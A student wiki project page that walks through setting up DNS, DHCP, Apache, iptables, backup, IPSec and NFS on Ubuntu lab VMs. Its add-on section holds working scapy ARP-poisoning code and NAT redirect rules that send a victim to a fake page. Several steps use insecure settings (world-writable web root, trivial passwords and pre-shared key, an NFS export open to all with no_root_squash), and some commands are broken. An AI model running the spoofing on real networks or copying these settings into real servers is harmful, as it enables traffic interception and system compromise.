Data Networking/Spring 2017/JXM
Motivation edit
As a network engineer, It's essential to understand and implement network configurations in Linux Operating System. This project aims to design a dynamic network solution using the Domain Name System Server (DNS), Dynamic Host Configuration Protocol Server (DHCP), Web Server, Firewall, Backup Server. The servers and clients will be able to automatically obtain IP addresses by DHCP Server and DNS Server. The clients will be able to get web pages from Web Server. In addition, Firewall and Backup Server will be added to provide a secure and robust network configurations for the company.
Team Members edit
Junhao Huang
Xinchen Zhang
Mayank Kashyap
Behavior of Protocols edit
Domain Name System edit
Domain Name System (DNS) is a hierarchical naming system for computers and services. It translates domain names to numerical IP addresses with different network protocols. A DNS name server stores the DNS records for a domain and replies the answers to its database. There are four most common types of records stored in DNS database:
- A and AAAA: IP addresses
- NS: Name Server, hostname of the authoritative server
- MX: SMTP mail exchangers, transfers electronic mail messages from one computer to anther and translates mail server to the its canonical name
- CANME: A Canonical Name Record is used to translate a domain name to the canonical domain.
- PTR: IP address to hostname translation
Dynamic Host Configuration Protocol edit
Dynamic Host Configuration Protocol (DHCP) is a client/server protocol that automatically provides an Internet Protocol (IP) host with its IP address and other related configuration information such as the subnet mask and default gateway. RFCs 2131 and 2132 define DHCP as an Internet Engineering Task Force (IETF) standard based on Bootstrap Protocol (BOOTP), a protocol with which DHCP shares many implementation details. DHCP allows hosts to obtain required TCP/IP configuration information from a DHCP server.
Why is DHCP required?
Every device on a TCP/IP-based network must have a unique unicast IP address to access the network and its resources. Without DHCP, IP addresses for new computers or computers that are moved from one subnet to another must be configured manually; IP addresses for computers that are removed from the network must be manually reclaimed. With DHCP, this entire process is automated and managed centrally. The DHCP server maintains a pool of IP addresses and leases an address to any DHCP-enabled client when it starts up on the network. Because the IP addresses are dynamic (leased) rather than static (permanently assigned), addresses no longer in use are automatically returned to the pool for reallocation. The network administrator establishes DHCP servers that maintain TCP/IP configuration information and provide address configuration to DHCP-enabled clients in the form of a lease offer. The DHCP server stores the configuration information in a database that includes: Valid TCP/IP configuration parameters for all clients on the network.
Valid IP addresses, maintained in a pool for assignment to clients, as well as excluded addresses.
Reserved IP addresses associated with particular DHCP clients. This allows consistent assignment of a single IP address to a single DHCP client.
The lease duration, or the length of time for which the IP address can be used before a lease renewal is required.
A DHCP-enabled client, upon accepting a lease offer, receives: A valid IP address for the subnet to which it is connecting.
Requested DHCP options, which are additional parameters that a DHCP server is configured to assign to clients. Some examples of DHCP options are Router (default gateway), DNS Servers, and DNS Domain Name. For a full list of DHCP options, see DHCP Tools and Options.
–2601:197:800:2EFA:B827:C938:5A64:EDBE (discuss) 02:52, 7 April 2017 (UTC)[1]
Webserver edit
Storing, processing and delivering webpages to clients is the basic function of a web server, which means that web servers host webpages to clients.
Apache2 is quite popular among people who would like to make a web server in Linux. phpmyadmin is good for configuring a web server.
Firewall edit
Firewall is a kind of computer system which is used to protect the network from internet attack. It is a barrier to between a internal network and other outside network.
By setting some rules to the server we can accept all the service we want and block others to make our internal network safe from the potential dangers from the Internet.
Backup edit
In case of the damage of the web server, a backup server is used to store the file and data on a network. So that the file and data would not be missed after the web server gets some error.
Requirements edit
- Configure a DNS server to resolve domain names and reverse domains
- Configure a DHCP server to assign IPv4 and IPv6 addresses dynamically
- Implement a web server to host a web page
- Implement a backup server to automatically install the server files using SSH and a NFS server
- Create a firewall to provide the security
Steps and Commands edit
DNS edit
Master DNS
Step1: Install the BIND9 DNS server:
sudo apt-get install bind9
Step2: Change hostname and host files:
sudo nano /etc/hostname
ubuntu
sudo nano /etc/hosts
127.0.0.1 localhost
192.168.10.2 ubuntu.jjxm.com ubuntu
Step3: Edit the name servers:
sudo nano /etc/resolvconf/resolv.conf.d/head
nameserver 192.168.10.2
nameserver 192.168.10.3
search jjxm.com
Step4: Edit the forwarders:
sudo nano /etc/bind/named.conf.options
forwarders {
192.168.10.1;
192.168.10.2;
192.168.10.3;
};
Step5: Edit forward and reverse zones:
#Forward IPV4 Zone
zone "jjxm.com" {
type master;
file "/etc/bind/db.jjxm.com";
allow-transfer { 192.168.10.3; };
also-notify { 192.168.10.3; };
};
#Reverse Zone
zone "10.168.192.in-addr.arpa" {
type master;
file "/etc/bind/db.192";allow-transfer { 192.168.10.3; };
allow-transfer { 192.168.10.3; };
};
#Reverse IPv6 zone
zone "0.0.0.0.0.0.0.0.0.0.0.0.8.8.1.1.ip6.arpa"{
type master;
file "/etc/bind/db.2001";
}
Step6: Create the zone files:
sudo nano /etc/bind/db.jjxm.com
; BIND data file for jjxm.com
;
$TTL 604800
@ IN SOA jjxm.com. root.jjxm.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ubuntu.jjxm.com.
@ IN A 192.168.10.2
@ IN AAAA 1188::2222
ubuntu IN A 192.168.10.2
ubuntu IN AAAA 1188::2222
www IN A 192.168.10.7
www IN AAAA 1199::3333
a IN CNAME www
b IN CNAME www
c IN CNAME www
d IN CNAME www
sudo nano /etc/bind/db.192
; BIND reverse data file for 192
;
$TTL 604800
@ IN SOA ubuntu.jjxm.com. root.jjxm.com. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
@ IN NS ubuntu.jjxm.com.
2 IN PTR ubuntu.jjxm.com.
1 IN PTR www.jjxm.com.
1 IN PTR a.jjxm.com.
1 IN PTR b.jjxm.com.
1 IN PTR c.jjxm.com.
1 IN PTR d.jjxm.com.
sudo nano /etc/bind/db.2001
; BIND reverse data file for 2001
;
$TTL 604800
@ IN SOA ubuntu.jjxm.com. root.jjxm.com. (
4 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ubuntu.jjxm.com.
@ IN NS ubuntu.jjxm.com.
1.1.1.1.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR ubuntu.jjxm.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR www.jjxm.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR a.jjxm.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR b.jjxm.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR c.jjxm.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR d.jjxm.com.
Step7: Restart the bind9
sudo nano /etc/init.d/bind9 restart
Slave DNS
Step1: Edit forward and reverse zones:
#Forward IPV4 Zone
zone "jjxm.com" {
type slave;
file "/etc/bind/db.jjxm.com";
allow-transfer { 192.168.10.2; };
};
#Reverse Zone
zone "10.168.192.in-addr.arpa" {
type slave;
file "/etc/bind/db.192";
allow-transfer { 192.168.10.2; };
};
#Reverse IPv6 zone
zone "0.0.0.0.0.0.0.0.0.0.0.0.8.8.1.1.ip6.arpa"{
type slave;
file "/etc/bind/db.2001";
}
Step2: Restart the bind9
sudo nano /etc/init.d/bind9 restart
DHCP edit
To install DHCP server, open a new Ubuntu VM to serve as DHCP server for your network. Once configured, this server cannot access internet anymore because of changes in the domain name and name servers. We will be using ISC (Internet Systems Consortium) DHCP server in our project and below are the steps for installation:
Step 1: Install ISC's dhcp server in terminal:
sudo apt-get isc-dhcp-server
Step 2: Indicate the network interface "ens33" in the isc-dhcp-server file located in /etc/default/ and also enable IPv6 through editing "OPTIONS=-6"
sudo nano /etc/default/isc-dhcp-server
#Inside the file, edit the following:
OPTIONS="-6"
INTERFACES="ens33"
Step 3: Make edits and changes to the DHCP configuration file for IPv4
#Comment the option domain-name and option domain-name servers as we'll define them later
#Uncomment authoritative
authoritative;
subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.20 192.168.10.100;
option domain-name-servers 192.168.10.2, 192.168.10.3;
option domain-name "jjxm.com";
option routers 192.168.10.1;
option broadcast-address 192.168.10.255;
default-lease-time 21600;
max-lease-time 43200;
}
host Webserver {
hardware ethernet 00:0c:29:f5:9c:e8;
fixed-address 192.168.10.7;
}
host MainDns {
hardware ethernet 00:0c:29:45:fc:50;
fixed-address 192.168.10.2;
}
host SlaveDns {
hardware ethernet 00:0c:29:47:f3:29;
fixed-address 192.168.10.3;
}
host Backup {
hardware ethernet 00:0c:29:60:9f:da;
fixed-address 192.168.10.10;
}
Step 4: Make changes to the virtual machine's interfaces by changing the interfaces file in /etc/network/
sudo nano /etc/network/interfaces
#Write the following
auto lo
iface lo inet loopback
auto ens33
iface ens33 inet static
address 192.168.10.6
netmask 255.255.255.0
gateway 192.168.10.1
network 192.168.10.0
broadcast 192.168.1.255
dns-domain-nameserver 192.168.10.2 192.168.10.3
dns-domain-search jjxm.com
iface ens33 inet6 static
address 2001:0db8:20ad:f103::6
netmask 64
Step 5: Edit the resolve file
sudo /etc/resolv.conf
#following edits in this file
nameserver 192.168.10.2
#its the main dns server
Step 6: Enable IPv4 and IPv6 forwarding
sudo nano /etc/sysctl.conf:
#in this file, uncomment these:
net.ipv4.conf.default.rp_filter=1
net.ipv4.ip_forward=1
net.ipv6.conf.all.forwarding=1
Step 7: Install radvd for IPv6 advertising using the following command
sudo apt-get install radvd
Step 8: Configure dhcpd6.conf to add IPv6 address pool
sudo nano /etc/dhcp/dhcpd6.conf
#Make the following changes in this file
ddns-update-style none;
authoritative;
allow leasequery;
dhcpv6-lease-file-name "var/lib/dhcp/dhcpd6.leases";
log-facility local7;
subnet6 2001:0db8:20ad:f103::/64 {
range6 2001:0db8:20ad:f103::20 2001:0db8:20ad:f103::100;
option dhcp6.name-servers 2001:0db8:f103::2,
2001:0db8:f103::3;
option domain-name "jxm.com";
defaut-lease-time 21600;
max-lifetime 43200;
host Webserver {
hardware ethernet 00:0c:29:f5:9c:e8;
fixed-address 2001:0db8:20ad:f103::7;
}
host MainDns {
hardware ethernet 00:0c:29:45:fc:50;
fixed-address 2001:0db8:20ad:f103::2;
}
host SlaveDns {
hardware ethernet 00:0c:29:47:f3:29;
fixed-address 2001:0db8:20ad:f103::3;
}
host Backup {
hardware ethernet 00:0c:29:60:9f:da;
fixed-address 2001:0db8:20ad:f103::10;
}
}
Step 9: Edit radvd configuration file
sudo nano /etc/radvd.conf
#in this file, write the following:
interface ens33 {
AdvSendAdvert on;
AdvOtherConfigFlag off;
prefix 2001:0db8:20ad:f103::/64 {
AdvOnLink on;
AdvAutonomous on;
AdvRouterAddr on;
};
);
Step 10: Restart the network interface (NOTE: THIS WILL DISABLE YOUR INTERNET CONNECTION IN THE VM)
sudo /etc/init.d/networking restart
Step 11: Start the DHCP server for IPv4 and IPv6
sudo service isc-dhcp-server start
sudo service isc-dhcp-server6 start
Web server edit
Step 1: We need to use Apache to as our web server, so we install Apache first Command:
sudo apt-get update
sudo apt-get install apache2
Step 2: Install PHP Command:
sudo apt-get install php
Step 3: Install MySQL, and set the password as“linux”
Command:
sudo apt-get install mysql-server
Step 4: Check if mysql is working
Command:
sudo netstat -tap | grep mysql
tcp 0 0 localhost:mysql *:* LISTEN 841/mysqld
Step 5: Install phpmyadmin, choose apache when installing, and also set the password as "linux"
Command:
sudo apt-get install phpmyadmin
Step 6: To create the phpmyadmin like we have to use chmod command to change the authority of /var/www Command:
sudo chmod 777 /var/www
Step 7: Create the phpmyadmin link between /usr/share/phpmyadmin and /var/www/html, after that we can see there is a phpmyadmin file in /var/www/html Command:
sudo ln -s /usr/share/phpmyadmin /var/www/html
Step 8: Create a basic webpage “Index.htm”, and we can see a index.html file in /var/www/html
Step 9: Go into the configuration of apache2 and change the default webpage catalog “/var/www” to “/home/ttno1”, and there is no '/' after directory path Command:
sudo vi /etc/apache2/apache2.conf
Step 10: Go into the configuration of 000-default and change the default webpage catalog “/var/www/html” to “/home/ttno1”
Command:
sudo vi /etc/apache2/sites-available/000-default.conf
Step 11: We need to restart the apache
Command:
sudo /etc/init.d/apache2 restart
Step 11: Use the browser on another host to visit the web server with its IP address.
Firewall[2] edit
Step 1: List the current rules in iptables, and if you never set up your server before, you should see:
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Command:
sudo iptables –L
Step 2: To allow established sessions to get traffic
Command:
sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
And if the command above does not work, try the following one:
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPTED
Step 3: Set up SSH, HTTP, FTP, TFTP, DHCP, DNS, VPN
Command:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 546 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 547 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT
sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
Step 4: To send network packets to let computers' serveics cummunicate with each other.
Command:
sudo iptables -I INPUT 1 -i lo -j ACCEPT
Step 5: Accept all traffic on loopback interface
Command:
sudo iptables -A INPUT -i lo -j ACCEPT
sudo iptables -A OUTPUT -o lo -j ACCEPT
Step 6: To establish outgoing connections
Command:
sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT
Step 7: Set up from internal to external
Command:
sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT
Step 8: To drop Invalid Packets
Command:
sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
Step 9: The function of deny ping
Command:
sudo iptables –A INPUT –p icmp --icmp-type echo-request –j REJECT
Step 10: For each client we set up a 10 connection limit for them
Command:
sudo iptables -A INPUT -p tcp –-dport 22 –m connlimit –-connlimit-above 10 –j REJECT
Step 11: To prevent HTTP flood
Command:
sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT
Step 12: If there is a need of block an IP Address
Command:
sudo iptables -I INPUT -s 192.168.10.134 -j DROP
Step 13: If you would like to cancel the block IP address
Command:
sudo iptables -D INPUT -s 192.168.10.134 -j DROP
Step 14: Make permittion for VPN
Command:
Sudo iptables –A INPUT –p udp --dport 500 –j ACCEPT
Sudo iptables –A INPUT –p udp --dport 4500 –j ACCEPT
Sudo iptables –A INPUT –p esp –j ACCEPT
Step 15: Deny other settings
Command:
sudo iptables –A INPUT –j DROP
Step 16: To preserve your IPTABLES rules upon reboot, install iptables-persistant
Command:
sudo apt-get install iptables-persistent
Step 17: Once the rules are changed, run the following commands to save and reload them before and after reboot
Command:
sudo netfilter-persistent save
sudo netfilter-persistent reload
Backup edit
Step1: We use rsync to set up backup server.
sudo apt-get install rsync
Step 2: Then we install SSH on web server and backup server.
sudo apt-get install ssh
Step3: Generate a rsa key
ssh-keygen -t rsa
Step4: We generate the keys to another host.
ssh-copy-id b@192.168.10.10
Step5: Create a backup zip file on the master server:
sudo crontab -e
Step6: The files are zipped and compressed:
21 20 * * * sudo zip -r /home/b/backup -j /home/b/jjxm
Step7: The zip is transferred to the backup server
sudo crontab -e
Step8: Unzip the original files
40 20 * * * sudo unzip -o /home/b/Backup -d /home/b/jjxm
Testing Procedure edit
DNS edit
Step1: Use "nslookup" command to lookup the DNS server for different hostnames.
Step2: Use "dig" command to check the DNS records and zone files.
Step3: Turn the master DNS off and check nslookup.
DHCP edit
Step 1: Use the following command to check the status of dhcp server
sudo service isc-dhcp-server status
#It should show the following output:
isc-dhcp-server.service - ISC DHCP IPv4 server
Loaded: loaded (/lib/systemd/system/isc-dhcp-server.service; enabled; vendor
Active: active (running) since Fri 2017-04-14 19:04:35 PDT; 1h 33min ago
Docs: man:dhcpd(8)
Main PID: 1184 (dhcpd)
CGroup: /system.slice/isc-dhcp-server.service
└─1184 dhcpd -user dhcpd -group dhcpd -f -4 -pf /var/run/dhcp-server/
#The same is to be followed for IPv6 dhcp with the following command
sudo service isc-dhcp-server6 status
Step 2: To check if DHCP is leasing out addresses and other updates like acknowledgments and requests, use the following command after connecting DHCP to client. The red text represents the errors.
journalctl -xe
Step 3: Check output at client's and other hosts' end. If the hosts receive the addresses that were specified as static addresses by DHCP and if client receives an address in the range defined by DHCP, then our test procedure is successful.
Web Server edit
Step1: Turn on your web server.
Step2: Open a browser on a client and enter the IP address of the web server to check if we can get access to the webpage of the server.
Firewall edit
Method 1 edit
Ping client's IP address in the terminal of web server's ubuntu and it successes.
Ping web server's IP address in the terminal of client and it shows destination port unreachable.
Method 2 edit
Step 1: Open a browser and enter the IP address of the web server in a client.
Step 2: Block the IP address of the client by adding a IPtable on the terminal of the web server.
Step 3: Refresh the webpage in the client side. And see if the webpage can be refreshed.
Step 4: Delete the IPtable to allow the client get access to web server.
Step 5: Try again to refresh the webpage in the client side.
Backup edit
Check the files after the set time in crontab.
Integrated Testing
Adds-on edit
ARP edit
Step 1: We use scapy[3] and python to make our ARP Poinsoning, so we install scapy first. Command:
sudo apt-get install tcpdump python3-crypto ipython3
sudo apt install python-scapy
sudo apt install sysv-rc-conf
Step 2: To be the superuser and get higher authority, we reset the root password. Command:
sudo passwd root
Step 3: Start iptables after reboot Command:
sudo sysv-rc-conf --level 2345 iptables on
Step 4: Turn on IP forwarding Command:
sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
Step 5: Configure Scapy arp poison Command:
scapy
op=2
victim= '192.168.10.28'
spoof= '192.168.10.1'
mac='00:0c:29:73:56:67'
arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
send(arp)
op =1
arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
send(arp)
send(arp,inter=2,count=1000)
Step 6: Make a fake web page Command:
/etc/init.d/apache2 start
echo “HAHA U LOSE.” > /home/Mayank/index.htm
Step 7: Forward the traffic Command:
iptables -t nat --flush
iptables --zero
iptables -A FORWARD --in-interface ens33 -j ACCEPT
iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 192.168.10.30
IPSec edit
IPSec can be configured in any two virtual machines. In our case, we are configuring IPSec between two Ubuntu VMs with IP addresses: 192.168.10.21 and 192.168.10.25.
Step 1: Install ipsec in the first host using the following command
sudo apt-get ipsec-tools strongswan-starter
Step 2: Go to the ipsec.conf file at /etc/ to update the parameters
#on both hosts, type this command:
sudo nano /etc/ipsec.conf
#Host 1
conn host1-to-host2
authby=secret
auto=route
keyexchange=ike
left=192.168.10.21
right=192.168.10.25
type=transport
esp=aes128gcm16!
#Host 2
conn host2-to-host1
authby=secret
auto=route
keyexchange=ike
left=192.168.10.25
right=192.168.10.21
type=transport
esp=aes128gcm16!
Step 3: Configure the secrets file in both hosts
#on both hosts
sudo nano /etc/ipsec.secrets
#host 1
192.168.10.21 192.168.10.25 : PSK "1"
#host 2
192.168.10.25 192.168.10.21 : PSK "1"
Step 4: Use this command to restart the ipsec processes
sudo ipsec restart
Step 5: Check the ipsec status
sudo ipsec statusall
#Obtain an output like this:
#Status of IKE charon daemon (strongSwan 5.3.5, Linux 4.4.0-31-generic, x86_64):
# uptime: 7 seconds, since Apr 14 21:02:45 2017
# malloc: sbrk 1351680, mmap 0, used 327664, free 1024016
# worker threads: 11 of 16 idle, 5/0/0/0 working, job queue: 0/0/0/0, scheduled: 0
# loaded plugins: charon test-vectors aes rc2 sha1 sha2 md4 md5 random nonce x509 revocation constraints pubkey pkcs1 pkcs7 pkcs8 pkcs12 pgp dnskey sshkey pem openssl fips-prf gmp agent xcbc hmac gcm attr kernel-netlink resolve socket-default connmark stroke updown
#Listening IP addresses:
#Connections:
#host1-to-host2: 192.168.10.21...192.168.10.25 IKEv1/2
#host1-to-host2: local: [192.168.10.21] uses pre-shared key authentication
#host1-to-host2: remote: [192.168.10.25] uses pre-shared key authentication
#host1-to-host2: child: dynamic === dynamic TRANSPORT
#Routed Connections:
#host1-to-host2{1}: ROUTED, TRANSPORT, reqid 1
#host1-to-host2{1}: 192.168.10.21/32 === 192.168.10.25/32
#Security Associations (0 up, 0 connecting):
# none
NFS edit
NFS-Server
Step 1: Inatall nfs-kernel-server Command:
sudo apt-get install nfs-kernel-server
sudo apt-get install rpcbind
Step 2: Make share folder Command:
sudo mkdir /home/mayank/Desktop/nfs
Step 3: Edit configuration Command:
sudo vim /etc/exports
/home/mayank/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)
Step 4: Restart service Command:
sudo service rpcbind restart restart
sudo service restart nfs-kernel-server restart
Step 5: Test Command:
showmount -e
Export list for ubuntu:
/home/mayank/Desktop/nfs *
NFS-Clients
Step 1: Inatall nfs-common for clients Command:
sudo apt-get install nfs-common
sudo apt-get install rpcbind
Step 2: Make share folder Command:
mkdir /home/client1/Desktop/nfs
Step 3: Mount the share file Command:
sudo mount -t nfs 192.168.10.2:/home/nfs/Desktop/nfs /home/client1/Desktop/nfs
Step 4: Mount this share file when turn on the client Command:
sudo vim /etc/rc.local
sudo mount -t nfs 192.168.10.2:/home/nfs/Desktop/nfs /home/client1/Desktop/nfs
Reference edit
2. https://help.ubuntu.com/community/BIND9ServerHowto
3. http://www.webopedia.com/TERM/B/backup_server.html
4. https://en.wikipedia.org/wiki/Domain_Name_System
6. https://wiki.strongswan.org